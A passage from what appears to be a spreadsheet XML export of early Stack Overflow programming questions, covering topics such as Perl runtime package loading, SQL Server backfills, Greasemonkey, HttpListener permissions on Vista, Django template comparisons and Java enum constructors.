&lt;p&gt;I am getting &lt;code&gt;89&lt;/code&gt;. Shouldn't it be &lt;code&gt;6789&lt;/code&gt;? Can anyone tell me why it is &lt;code&gt;89&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to interact with Command Line application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a component for an application that interacts tightly with a command line application. The command line application asks a series of questions, performs some computations, then terminates (which i need to detect). Essentially, i want to wrap up this interaction in a wrapper class.&lt;/p&gt;
&lt;p&gt;Has any one achieved similar in the past? If so, how did you go about it? Did you notice a pattern, or maybe some good build in classes to use? Cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use a Perl package known only in runtime?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl program, that needs to use packages (that I also write). Some of those packages are only chosen in Runtime (based on some environment variable). I don't want to put in my code a "use" line for all of those packages, of course, but only one "use" line, based on this variable, something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use $ENV{a};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, this doesn't work, of course. Any ideas on how to do this?&lt;/p&gt;
&lt;p&gt;Thanks in advance,
Oren&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Single web server and ETags</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if it is worth disabling ETags on an web application that is hosted on a single web server? Currently we don't make use of ETags in our application.&lt;/p&gt;
&lt;p&gt;If it is worth disabling them - why?&lt;/p&gt;
&lt;p&gt;Many thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How/Where to host an UDP based component?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;IÂ´m working on a project that basically will show some data collected from hardware devices through &lt;strong&gt;UDP&lt;/strong&gt; protocol.
the first idea of how to do this: implement a winService (to listen and persist the messages) and a wepApp to manage the data, based on .NET platform.&lt;/p&gt;
&lt;p&gt;IÂ´m confused about if exists the possibility to rent a "windows service" hosting, to deploy the "udp listener" component. &lt;/p&gt;
&lt;p&gt;thanx,!
Gorsh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Run script directly in 2 various browsers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created Ruby test script that use Selenium RC to test my web app directly in 2 browsers(IE, Firefox). My script runs - first on IE  then continue on Firefox and then should be continued and finished in already opened IE browser. My problem is: I can't continue(reconnect) to run my script in already opened IE browser. I use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@browser = RSpecSeleniumHelper.connect_browser("URL") 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it opens with new session (it needs to keep previous session).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Howto get filename from which class was included in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that the question is rather hard to understand, I didn't know how to ask it better, so I'll use this code example to make things more clear:&lt;br /&gt;
If I have the following files:&lt;/p&gt;
&lt;p&gt;test.php:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
 include('include.php');
 echo myClass::myStaticFunction();
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;include.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
 __autoload($classname){
  include_once("class/".$classname.".php"); //normally checking of included file would happen
 }
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;class/myClass.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
 class myClass{
  public static function myStaticFunction(){
   //I want this to return test.php, or whatever the filename is of the file that is using this class
   return SOMETHING;
  }
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the magic FILE constant is not the correct one, it returns path/to/myClass.php&lt;/p&gt;
</t>
  </si>
  <si>
    <t>From XML to object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to define an asp.net page from xml, then parse/render it by calling a command name. Just like they do in Flex. Does someone has an idea how to do that?&lt;/p&gt;
&lt;p&gt;Like for example, from XML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;button onClick="DoJavascript()" text="Submit"/&amp;gt;
&amp;lt;gridview ......./&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To parse:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:button runat="server" onClick="DoJavascript()" text="Submit"/&amp;gt;
&amp;lt;asp:gridview runat="server" ......./&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to do Unit Testing with Uncertainties?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have several different optimization algorithms that produce a different result for each run. For example the goal of the optimization could be to find the minimum of a function, where 0 is the global minima. The optimization runs returns data like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0.1, 0.1321, 0.0921, 0.012, 0.4]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is quite close to the global minima, so this is ok. Our first approach was to just choose a threshold, and let the unit test fail if a result occured that was too high. Unfortunately, this does not work at all: The results seem to have a gauss distribution, so, although unlikely, from time to time the test failed even when the algorithm is still fine and we just had bad luck. &lt;/p&gt;
&lt;p&gt;So, how can I test this properly? I think quite a bit of statistics are needed here. It is also important that tests are still fast, just letting the test run a few 100 times and then take the average will be too slow.&lt;/p&gt;
&lt;p&gt;Here are some further clarifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;For example I have an algorithm that fits a Circle into a set of points. It is extremly fast but does not always produce the same result. I want to write a Unit test to guarantee that in most cases it is good enough.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unfortunately I cannot choose a fixed seed for the random number generator, because I do not want to test if the algorithm produces the exact same result as before, but I want to test something like "With 90% certainty I get a result with 0.1 or better".&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Where can I find a Java to C# converter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I needed to convert a Java 1.5se app to C# 2.0.&lt;/p&gt;
&lt;p&gt;Does anyone know of a tool (preferably free/open source) to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom SharePoint feature in multiple scopes in document library - shows up as duplicates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom feature which is an Edit Control Block (ECB) action in a document library that gets deployed as a solution package (WSP). When you pull down the dropdown next to a file, you see the feature and when the ECB action is selected, the user is redirected to a custom application page.&lt;/p&gt;
&lt;p&gt;I allow this feature to be installed into all 4 different scopes: Farm, WebApplication, Site and Web. Each of them will be in a different solution package but share the same FeatureId, SolutionId etc. It is assumed that feature is only installed into one scope at a time. If an administrator deploys it, activates it and if we he/she wants to change the scope, deactivates it, everything works properly. If for some reason the administrator does not deactivate it first, the ECB action will have duplicate entries in the document library.&lt;/p&gt;
&lt;p&gt;For example, say we install it as Site scope (site collection) and later decides we want it in Farm scope instead and don't deactivate it first and instead just go to the Solution Management and retract and remove it. If we look at the site collection where it was previously available, we don't see the ECB action.&lt;/p&gt;
&lt;p&gt;If we then add the Farm scope solution package and deploy it, we will now see the ECB action in the site collection even though we have not deployed it and the feature.xml ActivateOnDefault attribute is set to false. If we then go ahead and activate it, we will now see two ECB actions.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas? I have added the feature.xml and elements.xml below.&lt;/p&gt;
&lt;p&gt;TIA,
Magnus&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;
&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;
    RegistrationType="List"
    RegistrationId="101"&lt;br /&gt;
    Location="EditControlBlock"
    Sequence="300"&lt;br /&gt;
    ImageUrl="/_layouts/images/MyFeature/MyOtherPic.gif"
    Title="My Feature"&lt;br /&gt;
    Description="My ECB feature"
    &gt;
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the major differences between C and C++ and when would you choose one over the other?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For those of you with experience with both, what are the major differences?  For a newcomer to either, which would be better to learn?  Are there situations where you might choose C but then other situations where you would choose C++?  Is it a case of use the best tool for the job or one is significantly better than the other. I know C++ is an "enhancement" of C, but it was created in '83 and hasn't completely replaced C so there must be something more to it.&lt;/p&gt;
&lt;p&gt;I know this question is subjective and I am not trying to start any religious war, so please try to be as objective as possible.  Clear strengths and weaknesses and comparisons.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Insert row in table for each id in another table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried searching here for a similar solution but didn't see one so I was wondering what is the best way to accomplish the following.&lt;/p&gt;
&lt;p&gt;I have a table with 17 million + rows all have a unique ID.  We have recently created a new table that will be used in conjunction with the previous table where the foreign key of the new table is the unique id of the old table.&lt;/p&gt;
&lt;p&gt;For ex.&lt;br /&gt;
Table 1 - id, field1, field2, field3...
table 2 - table1.id, field1 ...&lt;/p&gt;
&lt;p&gt;The problem is since we are migrating this into a live environment, we need to back fill table 2 with a row containing the id from table 1 for each row in table 1.
ex, table 1 - 1, test, null
table 2 now needs to have: 1, null, ...  and so on for each row that is in table1.  The main issue is that the ids are not all sequential in table 1 so we will have to read from table 1 and then insert based of the id of found into table 2.&lt;/p&gt;
&lt;p&gt;Is there any easier way to go about this?
Thanks in advance
Joe&lt;/p&gt;
&lt;p&gt;Also to clarify, table 2 will be new data and the only thing that it will contain from table 1 is the id to keep the foreign key relationship&lt;/p&gt;
&lt;p&gt;Also this is sql server 2000&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MethodInfo for EntityCollection instead of Queryable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am manually creating the equivalent lambda:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var function = p =&amp;gt; p.Child.Any(c =&amp;gt; c.Field == "value");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a MethodInfo reference to the "Any" method used with Expressions built in code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MethodInfo method = typeof(Queryable).GetMethods()
        .Where(m =&amp;gt; m.Name == "Any" &amp;amp;&amp;amp; m.GetParameters().Length == 2)
        .Single().MakeGenericMethod(typeof(Child));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My entities are:
Parent 1---* Child&lt;/p&gt;
&lt;p&gt;Child is a Navigation Property on Parent (p in the above lambda).  The type of the property is EntityCollection as created by the designer.&lt;/p&gt;
&lt;p&gt;I was looking for the proper way to reference the Any method to create that call. Marc gave me the answer how to get this here: &lt;a href="http://stackoverflow.com/questions/439172/calling-a-method-from-an-expression"&gt;http://stackoverflow.com/questions/439172/calling-a-method-from-an-expression&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But it doesn't work for the entity framework.  EntityCollection does not implement IQueryable, so how should the Any method be referenced.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Conversion between different units of measurement in SQL (in Access)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to program an access database but I'm using SQL for all my querying.  I've got the database almost complete but I have one query that has me stumped.  It is a database which contains recipes.  I have a table in which I have all the conversions for cooking (Tablespoon to Teaspoon, Teaspoon to Cup, etc.).  The user needs to be able to put in an ingredient using whatever units the recipe calls for (in other words, I cannot standardize the units, I have to find what they are).  Then I need to be able to convert these into a standardized unit.  This is where I'm having the problem because things like vegetables can come in cups, tablespoons, etc. whereas things like meats come in ounces, pounds, etc.  I want to avoid creating a bunch of vb if/then's.  I feel like there must be a way to do this with SQL but I can't seem to figure it out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to provoke a timer trigger in glassfish?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We need some consistency in our functional test cases.
The best we can do currently is to wait for an estimated time before the Java EE timers in the product should have been triggered. It would be much more predictable if the test cases could trigger the timers programmatically, probably with JMX.&lt;/p&gt;
&lt;p&gt;How can this be done? Is there a JMX interface to the Glassfish Timer facility which we can use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a specific XML document using namespaces in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We were given a sample document, and need to be able to reproduce the structure of the document exactly for a vendor.  However, I'm a little lost with how C# handles namespaces.  Here's a sample of the document:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;Doc1 xmlns="http://www.sample.com/file" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.sample.com/file/long/path.xsd"&amp;gt;
    &amp;lt;header&amp;gt;
        &amp;lt;stuff&amp;gt;data&amp;lt;/stuff&amp;gt;
        &amp;lt;morestuff&amp;gt;data&amp;lt;/morestuff&amp;gt;
    &amp;lt;/header&amp;gt;
 &amp;lt;/Doc1&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How I'd usually go about this is to load a blank document, and then start populating it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlDocument doc = new XmlDocument();
doc.LoadXml("&amp;lt;Doc1&amp;gt;&amp;lt;/Doc1&amp;gt;");
// Add nodes here with insert, etc...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once I get the document started, how do I get the namespace and schema into the Doc1 element?  If I start with the namespace and schema in the Doc1 element by including them in the LoadXml(), then &lt;em&gt;all&lt;/em&gt; of the child elements have the namespace on them -- and that's a no-no.  The document is rejected.&lt;/p&gt;
&lt;p&gt;So in other words, I have to produce it EXACTLY as shown.  (And I'd rather not just write text-to-a-file in C# and hope it's valid XML).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to name columns in an INSERT statement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I do SELECT statements in PHP code I always select named columns, like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT id, name from users;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;rather than using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * from users;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This has the advantage of being more informative and readable, and also avoids problems later if new columns are added to the table.&lt;/p&gt;
&lt;p&gt;What I'm wondering is, is it possible to use the same idea in an INSERT statement? I'm imagining it might be something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT into people values (id=1, name="Fred");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The syntax as I've shown in this example doesn't work, but I wonder if something equivalent is possible? If not, does anyone know why not? Is it a deliberate omission?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it impossible to perform initialization before calling a superclass's constructor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like for a subclass of a certain superclass with certain constructor parameters to load an XML file containing information that I'd then like to pass to the superconstructor. Is this impossible to achieve?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get greasemonkey to call a function on a page after it loads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simple greasemonkey script that I want to call an already existing javascript function on the page. I've read the documentation and nothing seems to work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;window.setTimeout(function() { 
    alert('test') // This alert works, but nothing after it does
    myFunction() // undefined
    window.myFunction() // undefined
    document.myFunction() // undefined
}, 1000);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Are incrementers / decrementers (var++, var--) etc thread safe?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Inspired by this question: &lt;a href="http://stackoverflow.com/questions/443423/in-complexity-analysis-why-is-considered-to-be-2-operations"&gt;http://stackoverflow.com/questions/443423/in-complexity-analysis-why-is-considered-to-be-2-operations&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Take the following psuedo code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class test
{
   int _counter;
   void Increment()
   {
     _counter++;
   } 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would this be considered thread safe on an x86 architechure? Further more are the Inc / Dec assembly instructions thread safe? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decode/extract smime.p7m file contents (email with embedded files) with OpenSSL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an old process (VBScript) that reads a common mailbox and processes certain emails into a database.&lt;/p&gt;
&lt;p&gt;New regulations have all messages with attachments now being digitally signed.&lt;/p&gt;
&lt;p&gt;The process now only extracts one file (smime.p7m).  Using a GUI-based viewer, I can see the embedded files and extract them with no problem.  However, what I &lt;em&gt;really&lt;/em&gt; need is a command-line based extracter that will write out the embedded files (PDFs, DOCs, XLSs) - they're not encrypted, just signed.  I tested this by using a laptop that had no certificates and simply opened the smime.p7m file with the aforementioned viewer.&lt;/p&gt;
&lt;p&gt;It looks like OpenSSL will decode/extract this and someone managed to get a version compiled on Windows.  However, a lot of trial and error testing of the executable has been frustrating because I can't find the right combination of flags to just say "open the smime.p7m file and write out all the embedded files you find".  "openssl smime" always seems to want a "cert.pem" after all the options and I haven't got that.&lt;/p&gt;
&lt;p&gt;What am I missing?  Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HttpListener.Start() AccessDenied error on Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Running this code as a regular user throws HttpListenerException (access denied).  Snippet runs ok as an administator&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Program
{
    static void Main(string[] args)
    {
        HttpListener listener = new HttpListener();
        listener.Prefixes.Add("http://myip:8080/app/");
        listener.Start();
        //.... and so on
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i went ahead and added the uri using netsh (netsh http show lists the uri)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;netsh http add urlacl url=http://+:8080/app user=domain\user
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;still getting the same error.  Adding ACLs did work for other projects (they didn't use HttpListener though).  I tried multiple port/application name combinations, nothing works.&lt;/p&gt;
&lt;p&gt;Any ideas what might be the cause?&lt;/p&gt;
&lt;p&gt;Running .Net 3.5 SP1 on Vista&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django template ifequal comparison of decimals</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I have a decimalfield that can be 3 different values. In my view,
I pass in a dictionary of values that contains the appropriate decimal
values as keys.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{% for item in booklist %}  
    {% for key, value in numvec.items %}  
        {{item.number}}  
        {% ifequals item.number {{key}} %}  
            {{value}}  
        {% endifequals %}  
    {% endfor %}
{% endfor %}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this is the dict I pass in as numvec:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;numvec = {"TEST":Decimal("0.999"), "TEST2":Decimal("0.500"),
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;"TEST3":Decimal("0.255")}&lt;/p&gt;
&lt;p&gt;the number field was defined as having these choices in my model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BOOK_CHOICES=((Decimal("0.999"), 'TEST'),(Decimal("0.500"), 'TEST2'),(Decimal("0.255"), 'TEST3'),)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The item number prints out just fine in the view if I compare the dict
with the attribute, but for some reason the ifequals cannot properly
compare two decimals together. Is this a bug, or am I doing something
wrong in my template with ifequals? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Div with horizontal scrolling only</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a fixed width DIV containing a table with many columns, and need to allow the user to scroll the table horizontally within the DIV.&lt;/p&gt;
&lt;p&gt;This needs to work on IE6 and IE7 only (internal client application).&lt;/p&gt;
&lt;p&gt;The following works in IE7:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;overflow-x: scroll;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone help with a solution that works in IE6 as well?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java toString() using reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was writing a toString() for a class in Java the other day by manually writing out each element of the class to a String and it occurred to me that using reflection it might be possible to create a generic toString() method that could work on ALL classes. I.E. it would figure out the field names and values and send them out to a String.&lt;/p&gt;
&lt;p&gt;Getting the field names is fairly simple, here is what a co-worker came up with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static List initFieldArray(String className) throws ClassNotFoundException {
    Class c = Class.forName(className);
    Field field[] = c.getFields();
    List&amp;lt;String&amp;gt; classFields = new ArrayList(field.length);
    for (int i = 0; i &amp;lt; field.length; i++) {
        String cf = field[i].toString();
        classFields.add(cf.substring(cf.lastIndexOf(".") + 1));
    }
    return classFields;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using a factory I could reduce the performance overhead by storing the fields once, the first time the toString() is called. However finding the values could be a lot more expensive.&lt;/p&gt;
&lt;p&gt;Due to the performance of reflection this may be more hypothetical then practical. But I am interested in the idea of reflection and how I can use it to improve my everyday programming.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>error when trying to install MSMQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have VS-2003, VS-2005, VS-2008&lt;/p&gt;
&lt;p&gt;Tried enabling MSMQ in Add/Remove Windows Components and get this&lt;/p&gt;
&lt;p&gt;'A local user is authenticated as an anonymous user and cannot access active directory. You need to log on as a domain user to access Active directory.'&lt;/p&gt;
&lt;p&gt;I am trying to do development on my machine and want to set up a private Q so that I can develop a MSMQ application.&lt;/p&gt;
&lt;p&gt;This is similar to this situation: I am on my machine as an admin. Am logged into VPN and trying the above.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://groups.google.com/group/microsoft.public.msmq.setup/browse_thread/thread/5819165067560863" rel="nofollow"&gt;link text&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to host an asp.net mvc app on a domain that points to a subfolder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the folowing scenario:&lt;/p&gt;
&lt;p&gt;www.somedomain.com -&gt; this points to a folder on a shared host, say /MyFolder1
www.otherdomain.com -&gt; this points to another folder on the same shared host, say /MyFolder2&lt;/p&gt;
&lt;p&gt;With asp.net mvc my urls get mapped to:&lt;/p&gt;
&lt;p&gt;www.somedomain.com/MyFolder1/Action
www.somedomain.com/MyFolder2/Action&lt;/p&gt;
&lt;p&gt;I (obviosly) dont't want to have "MyFolder1" and "MyFolder2" on my URLs. How do i solve this on asp.net MVC?&lt;/p&gt;
&lt;p&gt;I want to have:&lt;/p&gt;
&lt;p&gt;www.somedomain.com/Action
www.somedomain.com/Action&lt;/p&gt;
&lt;p&gt;But i need to keep the subfolders on IIS (or some other solution that allows me to have two sites, with different domains on the same hosting).&lt;/p&gt;
&lt;p&gt;Help is very much appreciated. &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Download time remaning predictor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any widgets for predicting when a download (or any other process) will finish based on percent done history?&lt;/p&gt;
&lt;p&gt;The trivial version would just do a 2 point fit based on the start time, current time and percent done but better option are possible.&lt;/p&gt;
&lt;p&gt;A GUI widgest would be nice but a class that just returns the value would be just fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>where should I save a complex MVC application UI state?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been having a look at several MVC frameworks (like rails, merb, cakephp, codeignitier, and similars...)&lt;/p&gt;
&lt;p&gt;All the samples I've seen are basically plain and simple CRUD pages, carrying all the infr needed in the querystring and the posted field values.&lt;/p&gt;
&lt;p&gt;I've got a couple of apps made with some sort of framework built with classic asp.&lt;/p&gt;
&lt;p&gt;This framework handles some CRUD stuff a little more complex than the examples I found.&lt;/p&gt;
&lt;p&gt;Something like master-detail, filtering by example, paging, sorting and similars.&lt;/p&gt;
&lt;p&gt;I have a controller class that it's just a finite state machine, that goes thru diferent states (like new, browse, filter, show, etc.), then performs the appropiate action depending on the event raised and finally retrieves the neede info to the calling page.&lt;/p&gt;
&lt;p&gt;To achieve this I have several hidden inputs to keep the state of the web page (like current id, filter criterias, order criterias, previous state, previous event, well, you get the idea)&lt;/p&gt;
&lt;p&gt;What do you think would be the finnest approach to achieve this kind of funcionality?&lt;/p&gt;
&lt;p&gt;hidden inputs built in the view and used from the controller??? (I guess that would be the equivalent of what I'm doing right now in classi asp)&lt;/p&gt;
&lt;p&gt;--&lt;/p&gt;
&lt;p&gt;(added in response to tvanfosson)&lt;/p&gt;
&lt;p&gt;basically, my question refers to the third category, the context-dependent setting (in respect to the other two categories I agree with you) the info I was storing in hidden fields to store them on the querystring, I guess that when you click on the "next page" you include everything you need to save in the querystring, right? so that piece of query string gets appended in each and every link that performns some kind of action...&lt;/p&gt;
&lt;p&gt;I'm not sure, what are the advantages and disadvantages of using the querystring instead of hidden inputs???&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why don't Django admin "Today" and "Now" buttons show up in Safari?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a Django application that contains a model with a date/time field. On my local copy of the application, the admin page for that particular model shows this for the date/time field:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.cs.wm.edu/~mpd/images/bugs/django-date-local.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;This is as expected. However, when I deploy to my webserver and use the application from there, I get this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.cs.wm.edu/~mpd/images/bugs/django-date-server.png" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;The application on the server is &lt;em&gt;exactly&lt;/em&gt; the same as my local copy, &lt;em&gt;except&lt;/em&gt; that I have debugging disabled on the server (but I don't think that should matter...should it?). Why does the admin app on the server differ from the local admin app?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Update&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The issue seems localized to Safari. The "Today" and "Now" buttons appear when the admin site is accessed via Firefox. It looks like Safari can't download some of the JavaScript files necessary to show these widgets (strange that Firefox can, though).&lt;/li&gt;
&lt;li&gt;I noticed that Safari is receiving a "304 Not Modified" code for the following files, but I'm not sure what that means, or how to fix it. Obviously, these are the JavaScript files and images that control the date/time widget:
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;RelatedObjectLookup.js&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DateTimeShortcuts.js&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;icon_calendar.gif&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;icon_clock.gif&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Why can't enum's constructor access static fields?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why can't enum's constructor access static fields and methods? This is perfectly valid with a class, but is not allowed with an enum.&lt;/p&gt;
&lt;p&gt;What I'm trying to do is store my enum instances in a static Map. Consider this example code which allows lookup by abbreivation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public enum Day {
    Sunday("Sun"), Monday("Mon"), Tuesday("Tue"), Wednesday("Wed"), Thursday("Thu"), Friday("Fri"), Saturday("Sat");
    private final String abbreviation;
    private static final Map&amp;lt;String, Day&amp;gt; ABBREV_MAP = new HashMap&amp;lt;String, Day&amp;gt;();
    private Day(String abbreviation) {
        this.abbreviation = abbreviation;
        ABBREV_MAP.put(abbreviation, this);  // Not valid
    }
    public String getAbbreviation() {
        return abbreviation;
    }
    public static Day getByAbbreviation(String abbreviation) {
        return ABBREV_MAP.get(abbreviation);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will not work as enum doesn't allow static references in its constructor. It however works just find if implemented as a class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static final Day SUNDAY = new Day("Sunday", "Sun");
private Day(String name, String abbreviation) {
    this.name = name;
    this.abbreviation = abbreviation;
    ABBREV_MAP.put(abbreviation, this);  // Valid
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the WCF equivalent of HttpContext.Current.Request.RawUrl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got some RESTful services running in a pure WCF context (i.e. ASP.NET compatibility is not enabled, and thus there is no &lt;code&gt;HttpContext.Current&lt;/code&gt; object available).&lt;/p&gt;
&lt;p&gt;The URLs to the services are rewritten at the start of the request using an &lt;code&gt;IHttpModule&lt;/code&gt; (which at that point does have an &lt;code&gt;HttpContext&lt;/code&gt; and rewrites it using &lt;code&gt;HttpContext.Current.RewritePath&lt;/code&gt;) to get rid of things like the &lt;code&gt;.svc&lt;/code&gt; extension from the URL.&lt;/p&gt;
